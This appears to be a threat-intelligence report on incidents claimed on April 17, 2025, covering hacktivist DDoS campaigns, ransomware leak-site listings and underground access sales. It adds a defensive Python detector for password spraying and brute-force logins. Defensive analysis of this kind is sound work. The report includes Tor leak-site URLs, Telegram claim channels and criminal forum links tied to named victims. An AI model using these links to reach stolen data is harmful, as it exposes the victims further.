1. Introduction
This report provides an analytical overview of the cyber threat landscape as observed through a specific dataset of incidents reported on April 17, 2025. The analysis is enriched by supplementary threat intelligence research concerning the tactics, techniques, procedures (TTPs), and motivations of relevant threat actors and prevalent attack methodologies. The objective is to deliver actionable intelligence for cybersecurity professionals and decision-makers navigating the complex and dynamic threat environment.
The incidents detailed herein occur against a backdrop of significant geopolitical tensions, particularly the ongoing conflicts related to Russia-Ukraine and Israel-Palestine. These conflicts demonstrably fuel hacktivist operations, often manifesting as Distributed Denial-of-Service (DDoS) attacks aimed at disruption and propaganda.1 Concurrently, the financially motivated cybercrime ecosystem, dominated by ransomware, continues to evolve. Ransomware groups increasingly employ sophisticated extortion tactics and leverage a thriving underground market for initial access and specialized tooling.
The scope of this analysis is primarily focused on the incidents logged for April 17, 2025, contextualized by the provided research materials. While representing a snapshot in time, these events illuminate broader trends and persistent threats. Key themes emerging from the data include the high volume of DDoS attacks conducted by pro-Russian hacktivist groups, the diversification of ransomware operations employing double extortion tactics across a global victim base, targeted attacks against specific sectors such as Government Administration and Manufacturing, and the pivotal role of online platforms like Telegram and the Tor network in facilitating threat actor operations.
2. Executive Summary
Cyber threat activity observed on April 17, 2025, was marked by a high tempo of operations, primarily characterized by numerous DDoS attacks attributed to hacktivist groups and multiple, distinct ransomware campaigns targeting organizations globally.
The most prominent threat actors active within this dataset included:
- NoName057(16): This pro-Russian hacktivist group dominated the DDoS landscape, accounting for 13 of the day’s DDoS claims against Ukrainian (five) and Polish (eight) entities. Their targets spanned government, defense, manufacturing, chemical, financial, and aviation sectors, consistent with their established geopolitical motivations and focus on disrupting nations supporting Ukraine.1
- Sarcoma & Qilin: These ransomware groups demonstrated significant activity. Qilin’s three victims were all US-based (Manufacturing, Hospitality, Education); Sarcoma’s five spanned the USA, Italy, the UK, and Taiwan across Real Estate, Transportation, Banking, Facilities Services, and the arts. Both groups claimed substantial data exfiltration volumes, underscoring the prevalent double extortion model.4
- SAFEPAY: This ransomware operation listed seven victims, the most of any single group that day: five in Germany, one in the UK, and one in Australia, concentrated in construction, architecture, and manufacturing. Their claims involved large data volumes (up to 239GB) and, where a deadline was stated, characteristically short extortion timelines (3-4 days), designed to maximize pressure on victims.7
- Other Actors: The threat landscape also featured activity from groups including NATION OF SAVIORS (DDoS in Bangladesh), Al Ahad (DDoS against US and Hungarian targets, including the Government of Hungary), Dark Storm Team (DDoS against BreachForums), Space Bears, DragonForce, MEDUSA, and RALord (ransomware across various regions), SECT0R16 (claimed OT access), and initial access vendors like cryptoday and Xirosina operating on underground forums. This diversity highlights a complex ecosystem with multiple actors pursuing varied objectives.
The most prevalent attack types observed were:
- DDoS: Accounting for 22 of the 46 logged incidents, DDoS was narrowly the largest category, driven largely by NoName057(16) against Ukrainian and Polish targets and reflecting the weaponization of cyber disruption in geopolitical conflicts.1 NATION OF SAVIORS, Al Ahad, and Dark Storm Team contributed the remaining DDoS claims.
- Ransomware: Almost as many incidents (21) involved diverse ransomware families (Sarcoma, Qilin, SAFEPAY, Space Bears, DragonForce, MEDUSA, RALord). These operations consistently employed double extortion tactics—encrypting data and threatening to leak exfiltrated sensitive information—targeting a global victim base across numerous sectors.9
- Initial Access Sales: The data included instances of compromised access credentials and specialized attack tools being offered for sale on underground platforms, indicating an active market that facilitates subsequent cyberattacks.
Victimology analysis revealed Ukraine and Poland as primary targets for DDoS attacks, while the United States (seven listings) and Germany (five) faced the most ransomware activity; the UK, Italy, Taiwan, Spain, Canada, and Australia each had one or two ransomware victims. Key targeted industries included Government Administration, Manufacturing (including Chemical, Defense, Electronics, Medical Equipment), Building and Construction, Aviation & Aerospace, Financial Services/Banking, IT Services, Education, Real Estate, and Hospitality & Tourism.
Key trends underscored by the day’s activity include the strong correlation between DDoS campaigns and geopolitical events, the increasing sophistication and diversification of ransomware TTPs (the Ransomware-as-a-Service model, double/triple extortion, and exploitation of known vulnerabilities, as described in the supplementary research rather than evidenced in the day’s claims themselves), and the critical operational roles of Telegram (for hacktivist coordination and claims) and the Tor network (for ransomware leak sites and communication).
Strategically, these observations necessitate robust DDoS mitigation capabilities, comprehensive multi-layered ransomware defense strategies (encompassing prevention, detection, and recovery, particularly focusing on data protection), and heightened awareness of the threats posed by the initial access market. Organizations must adopt adaptive security postures to counter these evolving and interconnected threats.
3. Analysis of Observed Incidents (April 17, 2025)
Overview
The cybersecurity incidents reported on April 17, 2025, provide a concentrated snapshot of the broader threat landscape, reflecting ongoing geopolitical cyber conflicts and persistent financially motivated criminal operations. The 46 distinct incidents claimed within this single 24-hour period underscore the high operational tempo maintained by various threat actors: 22 DDoS claims, 21 ransomware leak-site listings, two initial access claims, and one tooling advertisement. One caveat applies throughout: every entry is the actor’s own claim (a Telegram post or a leak-site listing, with check-host.net reports or screenshots offered as proof), so neither the attacks, the identification of the victims, nor the stated exfiltration volumes are independently verified here.
Breakdown by Attack Category
- DDoS Attacks:
Distributed Denial-of-Service attacks constituted the most frequent incident type observed. The pro-Russian hacktivist group NoName057(16) was responsible for the vast majority of these, launching a coordinated campaign against targets in Ukraine and Poland. Victims included government entities (National Agency of Ukraine on Civil Service, Polish Agency for Enterprise Development, Przemyśl Municipal Roads Authority), defense-related organizations (Athlon Avia), manufacturing companies (Tochprylad, PESA Bydgoszcz SA.), aviation and aerospace firms (CESARA TELEMETRY), chemical manufacturers (Grupa Azoty and its subsidiaries Sklep Grupa Azoty, Grupa Azoty Puławy, Inwestor Grupa Azoty), financial services (Getin Holding), and government relations firms (Sparing-Vist Centre). This intense focus on Ukraine and Poland, a key NATO ally and supporter of Ukraine, directly aligns with NoName057(16)’s stated mission to destabilize perceived anti-Russian forces and disrupt support networks for Ukraine in the context of the ongoing war.1 The selection of targets within government, defense, and critical industries like chemical manufacturing and transportation suggests an intent to cause maximum disruption to state functions and economic activity supporting the war effort or perceived adversaries.
Other hacktivist groups also conducted DDoS attacks. NATION OF SAVIORS targeted several businesses in Bangladesh within the Hospitality & Tourism and Cosmetics sectors (Dhaka luxury spa, Novla thai spa, Allure Spa Premium, Neha Thai Spa). This specific targeting pattern diverges significantly from the typical geopolitical focus seen with groups like NoName057(16). While hacktivism can be driven by various ideologies including social or religious motivations 15, the choice of spa businesses is unusual and might point towards localized grievances, moral policing objectives within Bangladesh, or simply opportunistic targeting by a less sophisticated group. Further observation is required to clarify their specific agenda, which doesn’t align with the major conflict-driven hacktivism trends discussed in available research.2
The pro-Palestinian hacktivist group Al Ahad claimed responsibility for DDoS attacks against the US-based social media platform 4chan, two Hungarian airports (Győr-Pér International Airport, Budapest Airport), and the Government of Hungary’s portal (kormany.hu). Targeting airports and government sites is a common hacktivist tactic aimed at causing disruption and gaining visibility.1 The attack on 4chan could be symbolic, targeting a platform seen as representative of Western online culture, while the attacks on Hungarian targets might relate to Hungary’s perceived political stance or simply represent accessible targets within the broader anti-Western/anti-NATO narrative often associated with pro-Palestinian and allied groups.16 Separately, Dark Storm Team claimed a DDoS attack against BreachForums (breachforums.st), itself a well-known cybercrime forum; the claim states no motive, and the dataset categorizes the target as Computer & Network Security.
- Ransomware Attacks:
Multiple distinct ransomware operations claimed victims on April 17, highlighting the persistent and diverse nature of this threat. These attacks consistently involved claims of significant data exfiltration, reinforcing the double extortion model as standard practice.
- Sarcoma listed five victims across the USA, Italy, UK, and Taiwan, spanning Real Estate (Kaye Lifestyle Homes, 521GB claimed), Transportation & Logistics (Tralfo, 34GB), Banking & Mortgage (Manchester Credit Union Limited, 6GB), Facilities Services (Schultz Industries, Inc., 61GB), and Arts & Crafts (Ju Percussion Group Foundation, 1.6TB claimed). The extremely large volume claimed from Ju Percussion Group (1.6TB) stands out and could reflect targeting based on data richness or be an inflated figure used for psychological pressure.6 The types of data mentioned (Passport IDs, financial reports, PII) confirm a focus on sensitive information to maximize leverage.4
- Qilin (Agenda) claimed three US-based victims: Universal Window and Door LLC (Manufacturing, 35GB), Yankee Trails (Hospitality & Tourism, 96GB), and Bertie County Public Schools (Education, 50GB). The data types specified (customer details, payroll, student information including GPAs and IEPs) are highly sensitive, aligning with Qilin’s known double extortion strategy and targeting of critical sectors.5
- SAFEPAY listed seven victims, five in Germany, one in the UK, and one in Australia: Stadt Heilbronn (Government Administration, 85GB), Kellermann & Engelhardt ITEC GmbH (Building and construction, 70GB), Heinrich + Steinhardt GmbH (Architecture & Planning, 49GB), Hurst + Schröder GmbH (Manufacturing, 239GB), Eichele Bauunternehmung (Building and construction, 91GB), Helix Tool (UK, Manufacturing, 239GB), and Extreme Fire Solutions (Australia, Building and construction, 47GB). The concentration of German victims in construction, architecture, and manufacturing might indicate a specific campaign focus or affiliate preference. Where a deadline was stated (four of the seven listings), it was SAFEPAY’s characteristically short 3-4 days, designed to pressure victims into quick payment.7 The identical 239GB figure claimed for both Helix Tool and Hurst + Schröder is notable; it may be coincidence, a templated value, or a listing error, and leak-site volume claims should in any case not be taken at face value.
- Space Bears claimed two victims: Evertech Instrumental Co., Ltd. (ETI) (Taiwan, Electrical & Electronic Manufacturing) and Viñuelas Abogados (Spain, Law Practice & Law Firms). They alleged compromise of databases, financial documents, and personal information, with publication threatened in 6-8 days. This aligns with their focus on enterprises and use of double extortion.9
- DragonForce claimed two US victims: City of Grove (Government Administration, 78.92GB) and Iris ID Systems Inc (Information Technology Services, 204.66GB), with data publication threatened in 5-6 days. This demonstrates their global reach and targeting beyond initial geopolitical motivations.12
- MEDUSA claimed Lithium Americas Corp. (Canada, Mining/Metals) as a victim, threatening data publication in 8-9 days and providing sample screenshots. This fits their pattern of targeting large organizations in critical sectors using double extortion.10
- RALord, a relatively new group 11, claimed Bio-Clima Service Srl (Italy, Medical Equipment Manufacturing) with 50GB of data allegedly exfiltrated and a 7-8 day deadline. This adds another European victim to their early, likely opportunistic, targeting.11
The diversity of active groups, many operating under a Ransomware-as-a-Service (RaaS) model 5, fuels this widespread threat. The consistent claims of specific, sensitive data theft (financial records, PII, intellectual property, student/client data) across nearly all ransomware incidents confirm that data exfiltration is integral to the modern ransomware playbook, used to exert maximum pressure beyond mere operational disruption from encryption.5
- Initial Access & Alert:
Incidents related to the cybercrime supply chain were also observed. The threat actor ‘cryptoday’ advertised the sale of administrative access to an unidentified US organization’s WordPress WooCommerce shop via the exploit[.]in forum. Such access provides a direct pathway for financial fraud, data theft, or deployment of further malware like ransomware onto e-commerce platforms. Another actor, ‘Xirosina’, advertised corporate access checker and brute-force software on the same forum, designed to target common enterprise entry points like VPNs, ADFS, Citrix, CPanel, RDWeb, and OWA, with features like proxy support to evade detection. This highlights the market for tools that automate the initial stages of network compromise. Additionally, the hacktivist group SECT0R16, reportedly aided by OverFlame, claimed access to the heating system of Palazzo Raja in Italy. While seemingly minor, this claim aligns with SECT0R16’s documented focus on Operational Technology (OT) and Industrial Control Systems (ICS), potentially representing a demonstration of capability or an opportunistic intrusion into building automation systems.19 These incidents underscore the importance of the underground market in providing the access and tools that enable larger-scale attacks.
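The Xirosina listing above is a reminder that credential-guessing tools aimed at OWA, ADFS, VPN, Citrix, and RDWeb leave a recognisable footprint in authentication logs. The following is an added example, not code from this report or from any tool it mentions, of the three detections a defender would want against such tooling: single-account brute force, password spraying across many accounts from one source, and the distributed variant where the advertised proxy support spreads one account’s failures over many source addresses. The log format, the sample lines, and the thresholds are constructed assumptions.

```python
"""Brute-force, spray and distributed-guessing detection over auth logs.

Added example, not part of the original report or of any tool it mentions.
The log format is a constructed, simplified one:
    <ISO-8601 UTC timestamp> <service> <OK|FAIL> user=<name> src=<ip>
Thresholds are assumptions and must be tuned per environment.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<svc>\S+) (?P<result>OK|FAIL) user=(?P<user>\S+) src=(?P<src>\S+)$"
)

# Constructed sample (RFC 5737 documentation addresses, no real accounts):
#  - 203.0.113.7 tries six different users once each   -> password spray
#  - 198.51.100.9 hits "admin" nine times               -> single-account brute force
#  - "svc_backup" fails from four sources in 90 seconds -> distributed / proxied guessing
#  - 192.0.2.5 is a real user mistyping twice, then OK  -> benign, must not fire
SAMPLE_LOG = """\
2025-04-17T05:30:01Z owa FAIL user=alice src=203.0.113.7
2025-04-17T05:30:02Z owa FAIL user=bob src=203.0.113.7
2025-04-17T05:30:03Z adfs FAIL user=carol src=203.0.113.7
2025-04-17T05:30:04Z owa FAIL user=dave src=203.0.113.7
2025-04-17T05:30:05Z rdweb FAIL user=erin src=203.0.113.7
2025-04-17T05:30:06Z owa FAIL user=frank src=203.0.113.7
2025-04-17T05:31:00Z vpn FAIL user=admin src=198.51.100.9
2025-04-17T05:31:01Z vpn FAIL user=admin src=198.51.100.9
2025-04-17T05:31:02Z vpn FAIL user=admin src=198.51.100.9
2025-04-17T05:31:03Z vpn FAIL user=admin src=198.51.100.9
2025-04-17T05:31:04Z vpn FAIL user=admin src=198.51.100.9
2025-04-17T05:31:05Z vpn FAIL user=admin src=198.51.100.9
2025-04-17T05:31:06Z vpn FAIL user=admin src=198.51.100.9
2025-04-17T05:31:07Z vpn FAIL user=admin src=198.51.100.9
2025-04-17T05:31:08Z vpn FAIL user=admin src=198.51.100.9
2025-04-17T05:35:00Z citrix FAIL user=svc_backup src=203.0.113.21
2025-04-17T05:35:30Z citrix FAIL user=svc_backup src=203.0.113.22
2025-04-17T05:36:00Z citrix FAIL user=svc_backup src=203.0.113.23
2025-04-17T05:36:30Z citrix FAIL user=svc_backup src=203.0.113.24
2025-04-17T05:40:00Z owa FAIL user=grace src=192.0.2.5
2025-04-17T05:40:30Z owa FAIL user=grace src=192.0.2.5
2025-04-17T05:41:00Z owa OK user=grace src=192.0.2.5
"""


def parse_line(line):
    """Return a dict for one log line, or None if it does not match the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    event = m.groupdict()
    event["ts"] = datetime.strptime(event["ts"], "%Y-%m-%dT%H:%M:%SZ")
    return event


def _sliding(events, window):
    """Yield, for every event, the events in the trailing window ending at it."""
    events = sorted(events, key=lambda e: e["ts"])
    start = 0
    for end, ev in enumerate(events):
        while ev["ts"] - events[start]["ts"] > window:
            start += 1
        yield events[start:end + 1]


def detect(lines, window=timedelta(minutes=10), spray_users=5,
           brute_fails=8, distributed_srcs=3):
    """Return {"spray": {src: users}, "bruteforce": {(src, user): fails},
    "distributed": {user: sources}} for every threshold crossed in any window."""
    fails = [e for e in map(parse_line, lines) if e and e["result"] == "FAIL"]
    by_src, by_user = defaultdict(list), defaultdict(list)
    for e in fails:
        by_src[e["src"]].append(e)
        by_user[e["user"]].append(e)
    findings = {"spray": {}, "bruteforce": {}, "distributed": {}}
    for src, evs in by_src.items():
        for win in _sliding(evs, window):
            users = {e["user"] for e in win}
            if len(users) >= spray_users:  # one source, many accounts
                findings["spray"][src] = max(findings["spray"].get(src, 0), len(users))
            per_user = defaultdict(int)
            for e in win:
                per_user[e["user"]] += 1
            for user, n in per_user.items():
                if n >= brute_fails:  # one source, one account, many tries
                    key = (src, user)
                    findings["bruteforce"][key] = max(findings["bruteforce"].get(key, 0), n)
    for user, evs in by_user.items():
        for win in _sliding(evs, window):
            srcs = {e["src"] for e in win}
            if len(srcs) >= distributed_srcs:  # one account, many sources (proxy rotation)
                findings["distributed"][user] = max(findings["distributed"].get(user, 0), len(srcs))
    return findings


if __name__ == "__main__":
    for kind, hits in detect(SAMPLE_LOG.splitlines()).items():
        print(kind, hits)
```

The per-source checks alone are exactly what a proxy-rotating checker is built to slip past, which is why the third, per-account view is included: it only needs the failures for one account to cluster in time, regardless of where they come from. On real data, feed the function a stream of normalized events from the identity provider rather than raw lines, and treat the thresholds as a starting point for tuning against the environment’s baseline failure rate.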
Victim Analysis
- Geographic Distribution: The geographic spread of victims on April 17 reflects the different motivations driving threat activity. DDoS attacks were heavily concentrated in Ukraine and Poland, directly linked to the geopolitical activities of NoName057(16).1 Hungary and Bangladesh also experienced DDoS attacks from Al Ahad and NATION OF SAVIORS respectively, and the two US-hosted DDoS targets (4chan, BreachForums) were online platforms rather than conventional organizations. Ransomware victims were more globally distributed, with the largest number in the USA (seven, targeted by Sarcoma, Qilin, and DragonForce). European nations including Germany (SAFEPAY), Italy (Sarcoma, RALord, and the SECT0R16 OT claim), the UK (Sarcoma, SAFEPAY), and Spain (Space Bears) were also hit. Taiwan (Sarcoma, Space Bears), Canada (MEDUSA), and Australia (SAFEPAY) rounded out the ransomware victim list. This pattern suggests geopolitical factors dictate DDoS targeting, while financial motives drive ransomware groups to target organizations across developed economies perceived as having the capacity to pay ransoms.
- Targeted Industry Sectors: A wide range of industries were impacted. Government Administration was heavily targeted by DDoS (Ukraine, Poland, Hungary) and also ransomware (USA, Germany). Manufacturing was a prominent target for both DDoS (Ukraine, Poland) and ransomware (USA, Germany, UK, Taiwan, Italy), including sub-sectors like Chemical Manufacturing, Defense & Space, Electrical & Electronic Manufacturing, and Medical Equipment Manufacturing. Aviation & Aerospace (Ukraine, Hungary) and Financial Services/Banking (Poland, UK) were hit by DDoS and ransomware respectively. Other impacted sectors included IT Services (USA), Education (USA), Real Estate (USA), Hospitality & Tourism (USA, Bangladesh), Transportation & Logistics (Italy), Facilities Services (USA), Arts & Crafts (Taiwan), Law Practice (Spain), Mining/Metals (Canada), Building and Construction (Germany, Australia), Architecture & Planning (Germany), Social Media (USA), Computer & Network Security (USA), and Cosmetics (Bangladesh). The targeting of government, defense, and critical manufacturing aligns with strategic disruption goals often seen in geopolitical conflicts. The broad range of sectors hit by ransomware indicates largely opportunistic targeting driven by financial motives, focusing on organizations across various industries based on exploitable weaknesses and perceived ability to pay, rather than a strict industry focus for most groups.
Threat Actor Communication & Operations Platforms
The platforms used by threat actors on April 17 align closely with their operational needs and objectives:
- Telegram: This platform was the primary communication channel for hacktivist groups observed in the dataset, including NoName057(16), NATION OF SAVIORS, Al Ahad, Dark Storm Team, and SECT0R16. They used it to publicly claim responsibility for attacks, disseminate propaganda, share proof-of-downtime links (check-host.net reports), and potentially coordinate activities.1 The continued reliance on Telegram, even by groups like Al Ahad who previously announced intentions to migrate due to privacy concerns 17, underscores its effectiveness for reaching audiences and maintaining operational tempo within the hacktivist community.17
- Tor Network: The Tor network was exclusively used by the ransomware groups (Sarcoma, Qilin, SAFEPAY, Space Bears, DragonForce, MEDUSA, RALord) to host their Data Leak Sites (DLS) and potentially for negotiation portals. This provides the necessary anonymity for conducting illicit activities like publishing stolen data and demanding ransom payments.5
- Openweb Forums: Specific underground forums accessible on the open web, such as exploit[.]in, served as marketplaces for actors like ‘cryptoday’ and ‘Xirosina’ to advertise and sell compromised initial access credentials and specialized hacking tools.
This clear segmentation of platform usage—public-facing Telegram for hacktivist visibility, anonymized Tor for ransomware infrastructure, and specific forums for illicit commerce—reflects the distinct operational requirements of different types of threat actors.
Table 1: Summary of Observed Incidents (April 17, 2025)
Date (UTC) | Category | Threat Actor | Victim Organization | Victim Country | Victim Industry | Victim Site | Network | Summary / Claim | Published URL | Screenshots |
--- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
2025-04-17T12:20 | DDoS Attack | NoName057(16) | Cesara Telemetry | Ukraine | Aviation & Aerospace | chezara-telemetria.com | telegram | Claimed DDoS attack, provided proof link. | https://t.me/nnm05716rus/588 | https://d34iuop8pidsy8.cloudfront.net/be7752b1-0b75-4cc9-a03e-ca739fbfcf5b.png, https://d34iuop8pidsy8.cloudfront.net/2e9ebd72-925e-4fd9-be14-1c187bc5d432.png |
2025-04-17T12:13 | DDoS Attack | NoName057(16) | Tochprylad | Ukraine | Manufacturing | tochprilad.com | telegram | Claimed DDoS attack, provided proof link. | https://t.me/nnm05716rus/588 | https://d34iuop8pidsy8.cloudfront.net/c5b1bda3-5ddf-4510-b76a-e9e205254968.png, https://d34iuop8pidsy8.cloudfront.net/1dfa8992-fd4d-4057-ab00-adb23631fadd.png |
2025-04-17T12:13 | Ransomware | Sarcoma | Kaye Lifestyle Homes | USA | Real Estate | kayelifestylehomes.com | tor | Claimed 521GB data exfiltrated (Passport IDs, Budget Reports, etc.). Intent to publish in 6-7 days. | http://sarcomawmawlhov7o5mdhz4eszxxlkyaoiyiy2b5iwxnds2dmb4jakad.onion/ | https://d34iuop8pidsy8.cloudfront.net/46e0bf31-f64f-4a3e-b82f-4bba8147b028.png, https://d34iuop8pidsy8.cloudfront.net/d8381070-7cea-442d-9695-ffdef48f0a90.png |
2025-04-17T12:10 | DDoS Attack | NoName057(16) | National Agency of Ukraine on Civil Service | Ukraine | Government Administration | nads.gov.ua | telegram | Claimed DDoS attack, provided proof link. | https://t.me/nnm05716rus/588 | https://d34iuop8pidsy8.cloudfront.net/3494cde5-c220-4433-a9c2-c4f20baebd4b.png |
2025-04-17T12:07 | DDoS Attack | NoName057(16) | Athlon Avia | Ukraine | Defense & Space | athlonavia.com | telegram | Claimed DDoS attack, provided proof link. | https://t.me/nnm05716rus/588 | https://d34iuop8pidsy8.cloudfront.net/c5d41a3c-a733-4e71-80d4-ea82ec61bd28.png |
2025-04-17T12:06 | DDoS Attack | NoName057(16) | Sparing-Vist Centre | Ukraine | Government Relations | sparing-vist.ua | telegram | Claimed DDoS attack, provided proof link. | https://t.me/nnm05716rus/588 | https://d34iuop8pidsy8.cloudfront.net/5bb8d062-e0bf-466a-9bfd-82e0c1e5411c.png, https://d34iuop8pidsy8.cloudfront.net/fbfca9be-4429-4b85-b39a-46bf336870c9.png |
2025-04-17T11:00 | Ransomware | Qilin | Universal Window and Door LLC | USA | Manufacturing | universalwindow.com | tor | Claimed 35GB data exfiltrated (Customer details, payroll, quotes, etc.). | http://ijzn3sicrcy7guixkzjkib4ukbiilwc3xhnmby4mcbccnsd7j2rekvqd.onion/site/view?uuid=fd08719c-202e-3d69-9606-f05fae8ba478 | https://d34iuop8pidsy8.cloudfront.net/4b71aa4b-c41c-4d63-a61e-3d577e38e9b9.png |
2025-04-17T10:41 | DDoS Attack | NoName057(16) | Grupa Azoty | Poland | Chemical Manufacturing | grupaazoty.com | telegram | Claimed DDoS attack, provided proof link. | https://t.me/nnm05716rus/585 | https://d34iuop8pidsy8.cloudfront.net/27bf3b97-5638-4149-a51a-a3c377284e7e.png, https://d34iuop8pidsy8.cloudfront.net/a0931a17-4ff5-480d-8efe-1462fc906c32.png |
2025-04-17T10:35 | DDoS Attack | NoName057(16) | Getin Holding | Poland | Financial Services | getin.pl | telegram | Claimed DDoS attack, provided proof link. | https://t.me/nnm05716rus/585 | https://d34iuop8pidsy8.cloudfront.net/d75f3b00-f5a8-46cb-8681-1a8c516237f6.png, https://d34iuop8pidsy8.cloudfront.net/c097945f-f62f-4395-9079-0e3906aa4e9b.png |
2025-04-17T10:31 | Ransomware | Qilin | Yankee Trails | USA | Hospitality & Tourism | yankeetrails.com | tor | Claimed 96GB data exfiltrated (Passport, credit card forms, etc.). | http://ijzn3sicrcy7guixkzjkib4ukbiilwc3xhnmby4mcbccnsd7j2rekvqd.onion/site/view?uuid=81b360b5-1927-3938-89e6-1b7ff0c6c5a3 | https://d34iuop8pidsy8.cloudfront.net/4b9508a5-4bfc-4886-b4fe-c0c24f1b94fe.png |
2025-04-17T10:29 | DDoS Attack | NoName057(16) | Polish Agency for Enterprise Development (PARP) | Poland | Government Administration | en.parp.gov.pl | telegram | Claimed DDoS attack, provided proof link. | https://t.me/nnm05716rus/585 | https://d34iuop8pidsy8.cloudfront.net/aedd6c30-06c6-48bb-86fb-a9dc71df9182.png, https://d34iuop8pidsy8.cloudfront.net/6ddc128a-80d5-467f-8a8f-3320466aa1b4.png |
2025-04-17T10:23 | DDoS Attack | NoName057(16) | Przemyśl Municipal Roads Authority | Poland | Government Administration | zdm-przemysl.com | telegram | Claimed DDoS attack, provided proof link. | https://t.me/nnm05716rus/585 | https://d34iuop8pidsy8.cloudfront.net/d3f1390d-f437-4dc0-8aba-534b67c410e0.png, https://d34iuop8pidsy8.cloudfront.net/5b79b785-95c0-4b3c-a081-5a0ec9983818.png |
2025-04-17T10:20 | Ransomware | Qilin | Bertie County Public Schools | USA | Education | bertie.k12.nc.us | tor | Claimed 50GB data exfiltrated (Contracts, student PII, GPA, IEPs, etc.). | http://ijzn3sicrcy7guixkzjkib4ukbiilwc3xhnmby4mcbccnsd7j2rekvqd.onion/site/view?uuid=b8592709-99e2-30a6-95b7-61fd4949837d | https://d34iuop8pidsy8.cloudfront.net/1a0211b7-51b8-4cd0-b783-2f9b1fe74a47.png |
2025-04-17T10:12 | DDoS Attack | NoName057(16) | PESA Bydgoszcz SA. | Poland | Manufacturing | pesa.pl | telegram | Claimed DDoS attack, provided proof link. | https://t.me/nnm05716rus/585 | https://d34iuop8pidsy8.cloudfront.net/13ea9e96-dbd0-497f-bdcd-6c50f0ce6b84.png, https://d34iuop8pidsy8.cloudfront.net/f6197152-eea2-4733-89ca-99106ec24e3c.png |
2025-04-17T09:56 | DDoS Attack | NoName057(16) | Sklep Grupa Azoty | Poland | Chemical Manufacturing | sklep.grupaazoty.com | telegram | Claimed DDoS attack, provided proof link. | https://t.me/nnm05716rus/585 | https://d34iuop8pidsy8.cloudfront.net/f5b7d786-6e8e-48ef-a664-11b42c5a6622.png |
2025-04-17T09:52 | DDoS Attack | NoName057(16) | Grupa Azoty Puławy | Poland | Chemical Manufacturing | pulawy.grupaazoty.com | telegram | Claimed DDoS attack, provided proof link. | https://t.me/nnm05716rus/585 | https://d34iuop8pidsy8.cloudfront.net/6d27caa2-a568-49cc-b830-d2041872604e.png |
2025-04-17T09:45 | DDoS Attack | NoName057(16) | Inwestor Grupa Azoty | Poland | Chemical Manufacturing | inwestor.grupaazoty.com | telegram | Claimed DDoS attack, provided proof link. | https://t.me/nnm05716rus/585 | https://d34iuop8pidsy8.cloudfront.net/931aa8a2-41c6-42da-8c93-099610863cfc.png |
2025-04-17T09:42 | Ransomware | Sarcoma | Tralfo | Italy | Transportation & Logistics | tralfo.com | tor | Claimed 34GB data exfiltrated (ID cards, transport confirmations, etc.). Intent to publish in 6-7 days. | http://sarcomawmawlhov7o5mdhz4eszxxlkyaoiyiy2b5iwxnds2dmb4jakad.onion/ | https://d34iuop8pidsy8.cloudfront.net/85bdeaa8-9584-41da-b839-778e8752a02f.png |
2025-04-17T09:41 | Ransomware | Sarcoma | Manchester Credit Union Limited | UK | Banking & Mortgage | manchestercreditunion.co.uk | tor | Claimed 6GB data exfiltrated (IDs, financial reports, PII, etc.). Intent to publish in 7-8 days. | http://sarcomawmawlhov7o5mdhz4eszxxlkyaoiyiy2b5iwxnds2dmb4jakad.onion/ | https://d34iuop8pidsy8.cloudfront.net/772e350a-39b0-414d-8a9e-c5b49a7def62.png |
2025-04-17T09:22 | Ransomware | Sarcoma | Schultz Industries, Inc. | USA | Facilities Services | schultzindustries.com | tor | Claimed 61GB data exfiltrated (Claim/payment info, etc.). Intent to publish in 6-7 days. | http://sarcomawmawlhov7o5mdhz4eszxxlkyaoiyiy2b5iwxnds2dmb4jakad.onion/ | https://d34iuop8pidsy8.cloudfront.net/30531888-d6e0-43b4-8cfa-57458008c7ca.png |
2025-04-17T08:47 | Ransomware | Sarcoma | Ju Percussion Group Foundation | Taiwan | Arts & Crafts | jpg.org.tw | tor | Claimed 1.6TB data exfiltrated (National IDs, insurance reports, PII, etc.). Intent to publish in 8-9 days. | http://sarcomawmawlhov7o5mdhz4eszxxlkyaoiyiy2b5iwxnds2dmb4jakad.onion/ | https://d34iuop8pidsy8.cloudfront.net/a8bc4acf-2fcf-4f99-85a6-f03eff212adf.png |
2025-04-17T06:13 | Initial Access | cryptoday | Unidentified USA Organization | USA | Not specified | Not specified | openweb | Claimed sale of admin WP WooCommerce shop access. | https://forum.exploit.in/topic/257546/ | https://d34iuop8pidsy8.cloudfront.net/2b8c1073-0212-4713-abb7-62bf4960d84c.png |
2025-04-17T06:10 | DDoS Attack | NATION OF SAVIORS | Dhaka luxury spa | Bangladesh | Hospitality & Tourism | dhakaluxuryspa.com | telegram | Claimed DDoS attack, provided proof link. | https://t.me/c/2259100562/275 | https://d34iuop8pidsy8.cloudfront.net/aa9d06e0-e54e-4498-be70-643efa6dc24e.jpg |
2025-04-17T06:10 | DDoS Attack | NATION OF SAVIORS | Novla thai spa | Bangladesh | Hospitality & Tourism | novlathaispa.com | telegram | Claimed DDoS attack, provided proof link. | https://t.me/c/2259100562/275 | https://d34iuop8pidsy8.cloudfront.net/3ccd0c00-f2fb-49f9-8013-57bce6809991.jpg |
2025-04-17T06:10 | DDoS Attack | NATION OF SAVIORS | Allure Spa Premium | Bangladesh | Cosmetics | allurespabd.com | telegram | Claimed DDoS attack, provided proof link. | https://t.me/c/2259100562/275 | https://d34iuop8pidsy8.cloudfront.net/b16fb9a4-bf5f-4df8-be92-9a83870517b5.png |
2025-04-17T06:09 | DDoS Attack | NATION OF SAVIORS | Neha Thai Spa | Bangladesh | Cosmetics | nehathaispa.com | telegram | Claimed DDoS attack, provided proof link. | https://t.me/c/2259100562/275 | https://d34iuop8pidsy8.cloudfront.net/83f62ce0-cf8e-4c14-8fa2-97cfca0f9701.png |
2025-04-17T05:25 | Alert | Xirosina | Not applicable | N/A | N/A | N/A | openweb | Claimed sale of corporate access checker/brute-force software (VPNs, Web Panels, OWA). | https://forum.exploit.in/topic/257544/ | https://d34iuop8pidsy8.cloudfront.net/5ac22bdb-c34c-4e9a-8530-6f85f8f97886.png |
